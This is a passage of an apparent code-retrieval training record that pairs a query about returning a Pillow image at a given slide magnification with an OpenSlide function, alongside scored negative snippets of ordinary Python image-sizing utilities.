new_size.append(1.0) # for channel\n return scipy.ndimage.zoom(img, new_size, order=2)", "def scaled_image(width, height):\r\n total = width*height\r\n scale_dict = {0.2: 6500000, 0.3: 4000000, 0.4: 2250000, 0.5: 1000000, 0.8: 500000, 1: 0}\r\n for k, v in scale_dict.items():\r\n if total > v:\r\n return k", "def ratio(self):\n return float(self.max_width) / self.max_height", "def size(self):\n if self._size and not self._pil_image:\n return self._size\n else:\n return self.pil_image.size", "def _get_image_size(img: Any) -> List[int]:\n if _is_numpy_image(img):\n return img.shape[1::-1]\n raise TypeError(\"Unexpected type {}\".format(type(img)))", "def retinanet_compute_resize_scale(image_shape, min_side=800, max_side=1333):\n (rows, cols, _) = image_shape\n\n smallest_side = min(rows, cols)\n\n # rescale the image so the smallest side is min_side\n scale = float(min_side) / float(smallest_side)\n\n # check if the largest side is now greater than max_side, which can happen\n # when images have a large aspect ratio\n largest_side = max(rows, cols)\n if largest_side * scale > max_side:\n scale = float(max_side) / float(largest_side)\n\n return scale", "def maxSize(image, maxSize, method=3):\n imAspect = float(image.size[0]) / float(image.size[1])\n outAspect = float(maxSize[0] / float(maxSize[1]))\n\n if imAspect >= outAspect:\n return image.resize(\n (maxSize[0], int((float(maxSize[0]) / imAspect) + 0.5)), method\n )\n else:\n return image.resize(\n (int((float(maxSize[1]) * imAspect) + 0.5), maxSize[1]), 
method\n )", "def resize(img, output_size=(350, 350)):\n\n if img and hasattr(img, \"url\"):\n image = Image.open(img)\n m_width = float(output_size[0])\n m_height = float(output_size[1])\n w_k = image.size[0] / m_width\n h_k = image.size[1] / m_height\n if output_size < image.size:\n if w_k > h_k:\n new_size = (m_width, image.size[1] / w_k)\n else:\n new_size = (image.size[0] / h_k, m_height)\n else:\n new_size = image.size\n new_size = tuple(map(int, new_size))\n return new_size\n return None", "def test_modis_resize(self):\n modis_order = {'mod09a1': {'inputs': 'mod09a1.a2000072.h02v09.005.2008237032813',\n 'products': ['l1']},\n 'resampling_method': 'cc',\n 'resize': {'pixel_size': 30,\n 'pixel_size_units': 'meters'},\n 'format': 'gtiff'}\n\n exc = 'pixel count value is greater than maximum size of'\n\n try:\n api.validation(modis_order, self.staffuser.username)\n except Exception as e:\n assert(exc in str(e))\n else:\n self.fail('Failed MODIS pixel resize test')", "def _get_current_size(self, name):\n logger.debug(\"Getting size: '%s'\", name)\n if not self._previewtrain.get(name, None):\n return None\n img = self._previewtrain[name][1]\n if not img:\n return None\n logger.debug(\"Got size: (name: '%s', width: '%s', height: '%s')\",\n name, img.width(), img.height())\n return img.width(), img.height()", "def pixelSize(self):\n br = self.sceneBoundingRect()\n if self.image is None:\n return 1,1\n return br.width()/self.width(), br.height()/self.height()", "def get_image_size(fname):\r\n \r\n logging.debug('get_image_size({})'.format(fname))\r\n\r\n with open(fname, 'rb') as fhandle:\r\n head = fhandle.read(24)\r\n if len(head) != 24:\r\n return\r\n if imghdr.what(fname) == 'png':\r\n check = struct.unpack('>i', head[4:8])[0]\r\n if check != 0x0d0a1a0a:\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n width, height = struct.unpack('>ii', head[16:24])\r\n elif imghdr.what(fname) == 'gif':\r\n width, height = struct.unpack('<HH', head[6:10])\r\n elif imghdr.what(fname) == 'jpeg':\r\n try:\r\n fhandle.seek(0) # Read 0xff next\r\n size = 2\r\n ftype = 0\r\n while not 0xc0 <= ftype <= 0xcf:\r\n fhandle.seek(size, 1)\r\n byte = fhandle.read(1)\r\n while ord(byte) == 0xff:\r\n byte = fhandle.read(1)\r\n ftype = ord(byte)\r\n size = struct.unpack('>H', fhandle.read(2))[0] - 2\r\n # We are at a SOFn block\r\n fhandle.seek(1, 1) # Skip `precision' byte.\r\n height, width = struct.unpack('>HH', fhandle.read(4))\r\n except Exception: #IGNORE:W0703\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n else:\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n logging.debug('get_image_size - width, height = {}, {}'.format(width, height))\r\n return width, height", "def descender_size( self ):\n if self.face.descender == 0:\n return 0\n\n _desc_pixels = self.max_height * ( abs(self.face.descender) / self.face.height )\n return round( _desc_pixels ) # over 2.4 -> 2 ; 2.5 -> 2 ; 2.51 -> 3", "def getMaxMancount(self):\n return self.__size * 20", "def get_pixel_size(img):\n\tp1 = img.get_attr_default(\"apix_x\", -1.0)\n\tcc = img.get_attr_default(\"ctf\", None)\n\tif cc == None:\n\t\tp2 = -1.0\n\telse:\n\t\tp2 = round(cc.apix, 3)\n\tif p1 == -1.0 and p2 == -1.0:\n\t\tERROR(\"Pixel size not set\", \"get_pixel_size\", 0)\n\t\treturn -1.0\n\telif p1 > -1.0 and p2 > -1.0:\n\t\tif abs(p1-p2) >= 0.001:\n\t\t\tERROR(\"Conflict between pixel size in attribute and 
in ctf object\", \"get_pixel_size\", 0)\n\t\t# pixel size is positive, so what follows omits -1 problem\n\t\treturn max(p1, p2)\n\telse:\n\t\treturn max(p1, p2)", "def image_size():\n return eval(subprocess(\"print camera_image_size()\"))", "def minimum_size(self):\n return self.r_eff*3", "def _get_crop_size(self, image_size):\n h, w = image_size\n if self.crop_type == 'absolute':\n return (min(self.crop_size[0], h), min(self.crop_size[1], w))\n elif self.crop_type == 'absolute_range':\n assert self.crop_size[0] <= self.crop_size[1]\n crop_h = np.random.randint(\n min(h, self.crop_size[0]),\n min(h, self.crop_size[1]) + 1)\n crop_w = np.random.randint(\n min(w, self.crop_size[0]),\n min(w, self.crop_size[1]) + 1)\n return crop_h, crop_w\n elif self.crop_type == 'relative':\n crop_h, crop_w = self.crop_size\n return int(h * crop_h + 0.5), int(w * crop_w + 0.5)\n elif self.crop_type == 'relative_range':\n crop_size = np.asarray(self.crop_size, dtype=np.float32)\n crop_h, crop_w = crop_size + np.random.rand(2) * (1 - crop_size)\n return int(h * crop_h + 0.5), int(w * crop_w + 0.5)", "def test_correct_image_size(location):\n chunkloc = resave_to_chunks(root=location[\"dir\"],\n n_imgs=10,\n output_stem=location[\"stem\"])\n\n loaded = np.load(chunkloc)\n assert len(loaded.files) > 0\n\n first = loaded[loaded.files[0]]\n assert first.shape != ()\n assert first.shape == (520, 696)", "def getimagesize(filename):\n img = Image.open(filename)\n (w,h) = img.size\n t = \"IMAGETYPE_%S\" % img.format\n a = \"width=\\\"%d\\\" height=\\\"%d\\\"\" % img.size\n return (w,h,t,a)", "def default_size(self):\n if self._default_size is None:\n try:\n im = self.images['MUSE_WHITE']\n except KeyError:\n raise ValueError('Size of the image is required')\n else:\n self._default_size = (im.shape[0] *\n im.wcs.get_step(unit=u.arcsec)[0])\n return self._default_size", "def get_bounding_box_size(images):\n height = max(image.shape[0] for image in images)\n width = max(image.shape[1] for image in images)\n return height, width", "def get_bounding_box_size(images):\n height = max(image.shape[0] for image in images)\n width = max(image.shape[1] for image in images)\n return height, width", "def get_image_size(path : str):\n from PIL import Image\n im = Image.open(path)\n return im.size # W, H", "def get_dimensions(image_path):\n with Image.open(image_path) as img:\n return img.size", "def size(self):\n return self.__image.size", "def resize_to_box(im, size):\n #mx = np.max(im.shape[:2])\n\n factors = [size[i]/im.shape[i] for i in range(2)]\n\n f = np.min(factors)\n if f < 1.0:\n return resize_with_factor_new(im, f)\n else:\n return im", "def FindScale(self):\n\n ## 6 and from the cv code the distance is 6 then we are good\n print(\"TODO: Very hard\")", "def read_image_size(file_name):\n return Image.open(file_name).size", "def sizeHint(self):\n pixmap = self._pixmap\n if pixmap is not None:\n return pixmap.size()\n return super(QImageView, self).sizeHint()", "def get_image_size(path, width, type_name):\n fc = _os.path.getsize(path) / type_mapping[type_name].itemsize\n shape = [width, int(fc / width)]\n computed_size = shape[0] * shape[1] * type_mapping[type_name].itemsize\n measured_size = _os.path.getsize(path)\n return shape", "def get_bounded_shape(image, max_size):\n h, w, _ = image.shape\n aspect_ratio = w / h\n if h >= w:\n h = min(max_size, h)\n image_shape = (h, int(h * aspect_ratio))\n else:\n w = min(max_size, w)\n image_shape = (int(w / aspect_ratio), w)\n return image_shape", "def get_maxdist(self, 
pixel_size):\n\n total_area = self.minnpix_cluster*pixel_size**2.\n\n radius = ((np.sqrt(total_area)/2.))\n if radius > 1.0:\n radius = int(radius)\n else:\n radius = round_to_1(radius)\n dist = np.sqrt(2.*float(radius)**2.)\n dist = dist+(0.05*dist)\n\n return dist", "def determine_size(self):\n size = np.inf\n while size >= self.n:\n size = np.random.pareto(0.2)\n size = int(math.ceil(size))\n return size", "def pixel_scale(self):\n return np.abs(float(self.header[\"CDELT1\"]))", "def get_size(self):\n return self._surf.get_size()", "def _calc_figure_size(self):\n\n figheight_default = 6.125\n minsize = 0.025 * figheight_default # minimum size of an axis\n\n axheight = min(minsize, self.maxheight * figheight_default)\n\n w = 8. # inches\n # colorbar, gap, title + individual axes\n h = self.cb_height * figheight_default * 3. + self.get_n() * axheight\n\n return (w, h)" ]
[ "0.70223284", "0.69094974", "0.6904307", "0.6871893", "0.6834652", "0.67987007", "0.6753258", "0.6662533", "0.6641104", "0.6629991", "0.6623062", "0.66070765", "0.65710425", "0.6462559", "0.6438334", "0.64352167", "0.64264476", "0.6413869", "0.64073336", "0.6405353", "0.63959295", "0.6393958", "0.6378742", "0.6371808", "0.6340691", "0.63312304", "0.6328157", "0.63233536", "0.63168645", "0.6313881", "0.6311277", "0.6307973", "0.6304542", "0.62921464", "0.6279358", "0.6263461", "0.62493074", "0.62493074", "0.6240298", "0.6233915", "0.62338865", "0.6217503", "0.6178591", "0.61730736", "0.6167585", "0.6164485", "0.6151969", "0.61427164", "0.6142146", "0.6137868", "0.6131983", "0.61272395", "0.6123565", "0.6114681", "0.61078167", "0.6104271", "0.6089573", "0.60845745", "0.6078212", "0.60758066", "0.60703945", "0.6066421", "0.6058931", "0.60536206", "0.60434496", "0.6036967", "0.6003598", "0.600033", "0.599823", "0.598966", "0.59847486", "0.5974348", "0.5972826", "0.59711635", "0.59669405", "0.5964787", "0.5940145", "0.5939381", "0.5928259", "0.5927209", "0.59206325", "0.5914689", "0.59097517", "0.59013015", "0.5894841", "0.5894841", "0.5893944", "0.58806306", "0.58754176", "0.5859493", "0.5855417", "0.5851227", "0.584993", "0.58471453", "0.5843455", "0.5841386", "0.58272797", "0.58238703", "0.58223367", "0.5818176" ]
0.721434
0
Outputs a Pillow Image for a particular magnification
def read_slide_at_mag(slide, mag):
    exact_level = get_level_for_mag(slide, mag)
    if exact_level is not None:
        return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))
    else:
        max_size = slide.dimensions
        region_size = tuple(get_size_for_mag(slide, mag))
        downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])
        best_level = slide.get_best_level_for_downsample(downsample)
        best_level_size = get_level_size(slide, best_level)
        best_level_img = slide.read_region((0,0), best_level, best_level_size)
        return best_level_img.resize(region_size, resample = Image.BICUBIC)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def large_image(self):\n pass", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def main():\r\n original = SimpleImage(\"images/poppy.png\")\r\n original.show()\r\n # shrink function\r\n after_shrink = shrink('images/poppy.png')\r\n after_shrink.show()", "def galaxy(img):\n return img[420:490, 710:770]", "def exportImg(self):\n if self.superSampling:\n print(\"Exporting with size adjusted\")\n self.img = self.img.resize((int(self.width/2),int(self.height/2)),Image.NEAREST)\n self.img.save(self.fileName,\"PNG\")", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def small_image(self):\n pass", "def main():\n me = SimpleImage(\"images/me.JPG\")\n dinosaur = SimpleImage(\"images/dinosaur.jpg\")\n\n dinosaur.make_as_big_as(me)\n combine = magic(me, dinosaur)\n combine.show()", "def write_thumbnail(image_name, size):\n # TODO : use something else instead of image.thumbnail\n sizes = {\n 'small' : [30,40],\n 'medium' : [70,70],\n 'large' : [120,120]\n }\n image = Image.open(f'{WRITE_FOLDER}/{USER_NAME}/original/{image_name}')\n image.thumbnail((sizes[size][0], sizes[size][1]))\n image.save(f'{WRITE_FOLDER}/{USER_NAME}/{size}/{image_name}')", "def print_image(indiv,name):\n routine = gp.compile(indiv,pset)\n output = gen_beat_output(routine)\n bits = np.array(map(bitlist,output)[0:24000]).transpose()\n plt.style.use('classic')\n plt.imshow(bits,interpolation='nearest',aspect='auto',cmap=plt.get_cmap('Greys'))\n plt.savefig(name+\".png\",dpi=150)", "def gen_img_settings_quality(l):\n \n lhalf = 0.5*l\n \n ### sphere radius\n \n sphere_radius = 0.7\n #sphere_rgbcolor = [0.25,0.65,0.65]\n \n ### RESOLUTION\n \n img_widthpx = 1024\n img_heightpx = 1024\n\n ### includes and defaults\n\n povray_includes = [\"colors.inc\", \"textures.inc\", \"shapes.inc\"]\n povray_defaults = [vapory.Finish( 'ambient', 0.1,\n\t \t\t\t 'diffuse', 0.65,\n\t\t \t\t 'specular', 0.5,\n\t\t\t \t 'shininess', 0.53,\n\t\t\t\t 'opacity', 1.0)]\n\n\n ### light sources\n\n sun1 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', 'White')\n sun2 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', [0.7, 0.7, 0.7])\n\n ### background\n\n background = vapory.Background('color', [1,1,1])\n\n ### camera\n\n #povray_cam = vapory.Camera('angle', 75, 'location', [-15 , 15.0+0.5,15.0-0.25],'look_at', [0.25 , 15.0+0.5, 15.0-0.25])\n povray_cam = vapory.Camera('location', [lhalf, lhalf, -1.01*lhalf], 'look_at', [lhalf,lhalf,0], 'angle', 90)\n\n ### text\n # If desired include this in the povray_objects - array declared in the loop\n #text1 = vapory.Text( 'ttf', '\"timrom.ttf\"' ,'\"Division:\"', 0.01, 0.0, 'scale', [0.5,0.5,0.5],'rotate', [0,90,0], 'translate' , [0.0 , 15.0+2.75-1 , 15.0+1.5], vapory.Pigment('Black') ) \n\n ### render quality\n\n quality = 10\n \n return sphere_radius, img_widthpx, img_heightpx, povray_includes, povray_defaults, sun1, sun2, background, povray_cam, quality", "def generate_image(self):\n pass", "def 
plot_phot_transform(params, inst_mag, cal_mag, bandpass):\n\n fig = plt.figure(2)\n\n plt.plot(cal_mag, inst_mag,'k.')\n\n plt.xlabel('Catalog magnitude')\n\n plt.ylabel('Instrumental magnitude')\n\n plt.title('Relation between instrumental and catalogue magnitudes in '+\\\n bandpass)\n\n [xmin,xmax,ymin,ymax] = plt.axis()\n\n plt.axis([xmax,xmin,ymax,ymin])\n\n plt.savefig(path.join(params['red_dir'],\n 'phot_transform_'+bandpass+'.eps'))\n\n plt.close(2)", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def getRoverImage(self):\n # Your code goes here, this code is just an example\n return 'mario.ppm'", "def ImageOutput(name, out_ds, tile_size, resampling, init_dest, output_dir, verbose,mbtiles):\n\n resampler = Resampler(resampling)\n\n if name == \"hybrid\":\n return HybridImageOutput(out_ds, tile_size, resampler, init_dest, output_dir, verbose)\n\n if name == \"png\":\n image_format = \"PNG\"\n elif name == \"jpeg\":\n image_format = \"JPEG\"\n\n return SimpleImageOutput(out_ds, tile_size, resampler, init_dest, output_dir, verbose, [image_format],mbtiles)", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def set_mag(self, target_mag):\n raise NotImplementedError", "def generate_image_info(path):\n file_types = ['*.png', '*.jpg', '*.gif']\n for file_type in file_types:\n for img_path in glob.glob(path + file_type):\n img = Image.open(img_path)\n img_name = img_path.split('/')[-1].split('.')[0]\n with open(path + 'resolution.txt', 'a') as file:\n file.write(img_name + ' ' + str(img.size[0]) +\n ' ' + str(img.size[1]) + '\\n')", "def get_picture(self):\n if self.width>50 or self.height>50:\n return \"Too big for picture.\"\n\n br = '\\n'\n s = ''\n se = ('{:*>'+str(self.width)+'}').format('')\n for i in range(self.height):\n s += se + br\n return s", "def mosaic_thumbnail(self):\n serial = slugify(self.request.matchdict[\"serial\"])\n filename = \"thumbnails/%s/mosaic.png\" % serial\n return FileResponse(filename)", "def image(self, verbose=False):\n\n return self._action(FP_ModuleMorphism.image, verbose)", "def get_mag(self):\n raise NotImplementedError", "def resize(img):\n size = (500, 500)\n img.thumbnail(size)\n return img", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def test_pil_file_resize(self):\n self._test_img_resize(PILBackend())", "def draw_image(self):\n self.PDF.saveState()\n self.PDF.scale(1, -1)\n # self.PDF.drawImage(\n # LOGO, 490, -78, width=80, 
preserveAspectRatio=True, mask=\"auto\"\n # )\n self.PDF.restoreState()", "def getimage(self):", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def plot_amplitude_map(self, ampmap, maxamp, label, filter=0):\r\n\r\n mpl.title(label)\r\n\r\n #scipy.ndimage.gaussian_filter(self.amplitudeImage1, 2, order=0, output=self.amplitudeImage1, mode='reflect')\r\n\r\n imga1 = mpl.imshow(ampmap, cmap=matplotlib.cm.gray) \r\n\r\n mpl.colorbar()\r\n\r\n imga1.set_clim = (0.0, maxamp)", "def __draw_image(self):\n if self.image_name is not None:\n img = mpimg.imread(self.image_name)\n extent = (0.5, self.xmax+0.5, -0.5, self.ymax-0.5)\n self.ax.imshow(img, extent=extent, origin='lower',\n alpha=self.image_alpha)", "def customize_image_resolution(customization_dict,image_dir):\n resize_type=customization_dict['resize_type']\n padding_type=customization_dict['padding_type']\n width=customization_dict['width']\n height=customization_dict['height']\n\n print(customization_dict)\n if resize_type == 'pad':\n print(\"!!!!!!!!!!!!!!!!\")\n print(padding_type)\n padding_type = convert_padding_type(padding_type)\n pad_all_images(image_dir, width, height,\n padding_type, customization_dict['constant_color'])\n else:\n resize_all_images(image_dir, width,\n height, resize_type)", "def thumb_profil(log):\n\tpath = get_plato_path()\n\tfrom PIL import Image\n\tsize = 100,200\n\tim = Image.open('/%s/plato_users/%s/profil_BIG.jpg'%(path,log))\n\tim.thumbnail(size, Image.ANTIALIAS)\n\tim.save('/%s/plato_users/%s/profil.jpg'%(path,log),\"JPEG\")", "def get_url_for_min_resolution(self, min_height, min_width, image):", "def print_image(self, pil_image):\n bw_image = pil_image.convert('1', dither=Image.FLOYDSTEINBERG)\n width = bw_image.width\n height = bw_image.height\n img_bytes = list(bw_image.getdata())\n self.print_bitmap(width, height, img_bytes)", "def dem_jpeg(dem_file):\n out_file = dem_file+'.jpeg'\n rsc_file = out_file+'.rsc'\n shutil.copy2(dem_file+'.rsc', rsc_file)\n # read data\n dem = readfile.read(dem_file)[0]\n print('dem.shape:',dem.shape)\n # figure size\n ds_shape = tuple(reversed(dem.shape))\n fig_dpi = 300\n fig_size = [i / fig_dpi for i in ds_shape]\n print('fig_size:',fig_size)\n # color range\n disp_min = np.nanmin(dem) - 4000\n disp_max = np.nanmax(dem) + 2000\n # prepare shaded relief\n ls = LightSource(azdeg=315, altdeg=45)\n dem_shade = ls.shade(dem, vert_exag=0.3, cmap=plt.get_cmap('gray'), vmin=disp_min, vmax=disp_max)\n dem_shade[np.isnan(dem_shade[:, :, 0])] = np.nan\n print('dem_shade.shape:',dem_shade.shape)\n # plot\n fig, ax = plt.subplots(figsize=fig_size)\n ax.imshow(dem_shade, interpolation='spline16', origin='upper')\n # get rid of whitespace on the side\n ax.axis('off')\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_ticks([])\n fig.subplots_adjust(left=0,right=1,bottom=0,top=1)\n # output\n print('save figure to file {}'.format(out_file))\n plt.savefig(out_file, transparent=True, dpi=300, pad_inches=0.0)\n \n #resize to desired size(FA 8/19, unclear why size is wrong)\n im = Image.open(out_file)\n im_out = im.resize(dem.shape, Image.NEAREST)\n im_out.save(out_file)\n \n #plt.show()", "def resize_profile_pic(sender, instance, **kwargs):\n profile_pic = instance.profile_picture\n if profile_pic.name != \"default.png\":\n img = Image.open(profile_pic.path)\n if img.height > 300 or img.width > 300:\n output_size = (300, 300)\n img.thumbnail(output_size)\n img.save(profile_pic.path)", "def medoidMosaic(self,collection):\n \n\t\t# calculate the 
median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def showResized(name, image, scale):\n image = resizeImage(image, scale)\n cv.ShowImage(name, image)", "def thumbnail(self, fnameIn, fnameOut):\n cmd = \"convert -define jpeg:size=500x150 \"\n cmd += '\"%s\" ' % os.path.join(self.downloadFolder, fnameIn)\n cmd += \"-auto-orient -thumbnail 250x150 \"\n cmd += '\"%s\" ' % os.path.join(self.thumbnailFolder, fnameOut)\n self.log(\"creating thumbnail ...\")\n self.log(cmd)\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n process.wait()", "def get_thumbnail(format):", "def generate_thumbnail():\n import tempfile\n import glob\n from anima.env import mayaEnv\n m_env = mayaEnv.Maya()\n v = m_env.get_current_version()\n\n if not v:\n return\n\n # do not generate a thumbnail from a Repr\n if '@' in v.take_name:\n return\n\n task = v.task\n project = task.project\n # repo = project.repository\n imf = project.image_format\n width = int(imf.width * 0.5)\n height = int(imf.height * 0.5)\n\n temp_output = tempfile.mktemp()\n\n current_frame = pm.currentTime(q=1)\n output_file = pm.playblast(\n fmt='image',\n startTime=current_frame,\n endTime=current_frame,\n sequenceTime=1,\n forceOverwrite=1,\n filename=temp_output,\n clearCache=1,\n showOrnaments=1,\n percent=100,\n wh=(width, height),\n offScreen=1,\n viewer=0,\n compression='PNG',\n quality=70,\n framePadding=0\n )\n pm.currentTime(current_frame)\n\n output_file = output_file.replace('####', '*')\n found_output_file = glob.glob(output_file)\n if found_output_file:\n output_file = found_output_file[0]\n\n from anima.ui import utils\n utils.upload_thumbnail(task, output_file)\n\n return found_output_file", "def get_picture(self):\r\n line = \"\"\r\n if self.width > 50 or self.height > 50:\r\n return \"Too big for picture.\"\r\n if self.width <= 50:\r\n line_width = \"*\" * self.width\r\n for i in range(0, self.height):\r\n line += line_width + \"\\n\"\r\n return line\r\n elif self.height <= 50:\r\n line_width = \"*\" * self.width\r\n for i in range(0, self.height):\r\n line += line_width + \"\\n\"\r\n return line", "def my_phantomgallery( phantom_type ):\n\n if phantom_type == 'ellipses' or phantom_type == 'shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n M = np.array([[ .69, .92, 0, 0, 0, 1.],\n [ .6624, .8740, 0, -.0184, 0, -0.8],\n [ .1100, .3100, .22, 0, -18, -.2],\n [ .1600, .4100, -.22, 0, 18, -.2],\n [ .2100, .2500, 0, .35, 0, .1],\n [ .0460, .0460, 0, .1, 0, .1],\n [ .0460, .0460, 0, -.1, 0, .1],\n [ .0460, .0230, -.08, -.605, 0, .1],\n [ .0230, .0230, 0, -.605, 0, .1],\n [ .0230, .0460, .06, -.605, 0, .1]])\n\n\n elif phantom_type == 'modified_shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n p1 = [.7, .8, 0, 0, 0, 1]\n p2 = [.65,.75,0,0,0,-.9]\n p3 = 
[.15,.2,0,.4,0,.5]\n p4 = [.25,.15,-.25,.25,135.79,.2]\n p5 = [.25,.15,.25,.25,45.26,.2]\n p6 = [.08,.25,0,-.3,28.65,.65]\n p7 = [.05,.05,.5,-.3,0,.8]\n # combine into a matrix with one ellipse in each row\n M = np.array([p1, p2, p3, p4, p5, p6, p7]);\n \n\n\n elif phantom_type == 'squares':\n # [x center, y center, edge length ,phi=angle (degrees), greyscale=attenuation]\n s1 = [0,0,1.3,0,1]\n s2 = [0,0,1.1,0,-.9]\n s3 = [.1,-.1,.5,180/6,.4]\n s4 = [-.25,.15,.25,180/4,.2]\n s5 = [-.2,.25,.3,180/3,.4]\n #combine into a matrix with one square in each row\n M = np.array([s1, s2, s3, s4, s5]);\n\n elif (phantom_type == 'rectangles'):\n # [x center, y center, dimension 1, dimension 2, phi=angle (degrees), greyscale=attenuation]\n r1 = [0,0,1.3,1.1,0,1]\n r2 = [0,0,1.2,1,0,-.9]\n r3 = [0.25,.15,.25,.6,180/6,.4]\n r4 = [-.2,.1,.25,.20,180/4,.2]\n r5 = [-.3,.2,.3,.2,180/6,.4]\n #combine into a matrix with one square in each row\n M = np.array([r1, r2, r3, r4, r5])\n else:\n print('Unknown phantom_type')\n M = None\n\n return M", "def imdisplay(filename, representation):\n img = read_image(filename, representation)\n if representation == GS_REP:\n plt.imshow(img, cmap=plt.cm.gray)\n else:\n plt.imshow(img)", "def zoom_augmentation():\n # Get the width and the height of the zoomed version\n x_len, y_len = np.random.randint(250, 350, size=2)\n # Get left upper ,right and lower bound of the pixels in the original image\n left = np.random.randint(x_size-x_len)\n upper = np.random.randint(y_size-y_len)\n right, lower = left + x_len, upper+y_len\n # Crops the box and resizes it to the original image size\n box = (left, upper, right, lower)\n return lambda image: image.transform(image.size, Image.EXTENT, box)", "def make_mosaic(target_im, saved_file_name):\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n color_data_file = os.path.join(BASE_DIR, 'static/images/data/average_color.csv')\n color_data = materials_list_from_file(color_data_file)\n\n target_file = os.path.join(BASE_DIR, 'static/images/target/{}'.format(target_im))\n icon_im = image_process.open_image_RGB(target_file)\n icon_im_width, icon_im_height = icon_im.size\n mosaic_icon_im = Image.new('RGBA', (1600, 1600))\n\n for left in range(0, icon_im_width, DOT_AREA_ONE_SIDE):\n for top in range(0, icon_im_height, DOT_AREA_ONE_SIDE):\n average_color = calc.average_color_in_range(icon_im, left, top,\n left+DOT_AREA_ONE_SIDE, top+DOT_AREA_ONE_SIDE)\n if len(average_color) != 3:\n continue\n\n filename = similar_color_filename(average_color, color_data)\n # 距離最小のファイルを1600×1600の画像に貼り付け\n open_file = os.path.join(BASE_DIR, 'static/images/material/euph_part_icon/'+filename)\n area_im = Image.open(open_file)\n mosaic_icon_im.paste(area_im, (left//DOT_AREA_ONE_SIDE * THUMBNAIL_ONE_SIDE,\n top//DOT_AREA_ONE_SIDE * THUMBNAIL_ONE_SIDE))\n\n saved_file_path = 'static/images/ftnext/{}'.format(saved_file_name)\n saved_file = os.path.join(BASE_DIR, saved_file_path)\n mosaic_icon_im.save(saved_file)", "def smaller(self):\n w1, h1 = float(self.imwidth), float(self.imheight)\n w2, h2 = float(self.__huge_size), float(self.__huge_size)\n aspect_ratio1 = w1 / h1\n aspect_ratio2 = w2 / h2 # it equals to 1.0\n if aspect_ratio1 == aspect_ratio2:\n image = Image.new('RGB', (int(w2), int(h2)))\n k = h2 / h1 # compression ratio\n w = int(w2) # band length\n elif aspect_ratio1 > aspect_ratio2:\n image = Image.new('RGB', (int(w2), int(w2 / aspect_ratio1)))\n k = h2 / w1 # compression ratio\n w = int(w2) # band length\n else: # aspect_ratio1 < 
